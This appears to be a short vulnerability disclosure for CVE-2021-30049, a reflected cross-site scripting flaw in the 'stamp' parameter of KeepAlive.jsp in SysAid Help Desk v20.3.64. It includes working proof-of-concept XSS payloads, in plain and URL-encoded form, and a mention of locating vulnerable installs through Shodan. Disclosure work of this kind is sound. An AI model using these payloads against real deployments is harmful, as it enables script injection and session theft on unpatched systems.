SysAID

SysAid Technologies (formerly Ilient) is an international company founded in 2002 that develops and provides IT Service Management software. SysAid Technologies is a privately owned company, founded by Israel Lifshitz (also founder of NUBO Software).

SysAID Help Desk System v20.3.64 b14.

Every so often the application verifies the validation of the session through the KeepAlive.jsp script, this was checked through the proxy with Burp Suite.

With an external tool I verified the possibility of accessing the same file from another location.

KeepAlive.jsp uses the GET method to send the stamp, tabID and lastClick parameters to verify the validity of the session.

The return of the service is a Boolean response in addition to the content of the stamp parameter.

If the stamp parameter is modified, it can be verified that this value is reflected in the response.

The following is validating the existence of reflected cross-site scripting using the following payloads:

/KeepAlive.jsp?stamp=16170297<script>alert(String.fromCharCode(88,83,83,32,45,32,82,101,102,108,101,106,97,100,111))</script>83632

/KeepAlive.jsp?stamp=16170297″><svg onload=alert(1)>

Payload Url-encode (BurpSuite):

/KeepAlive.jsp?stamp=%31%36%31%37%30%32%39%37%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%53%74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%65%28%38%38%2c%38%33%2c%38%33%2c%33%32%2c%34%35%2c%33%32%2c%38%32%2c%31%30%31%2c%31%30%32%2c%31%30%38%2c%31%30%31%2c%31%30%36%2c%39%37%2c%31%30%30%2c%31%31%31%29%29%3c%2f%73%63%72%69%70%74%3e%38%33%36%33%32

The vulnerability is confirmed from the browser

The vulnerable version in Shodan search engine.

https://www.sysaid.com

CVE ID: CVE-2021-30049

#HappyHacking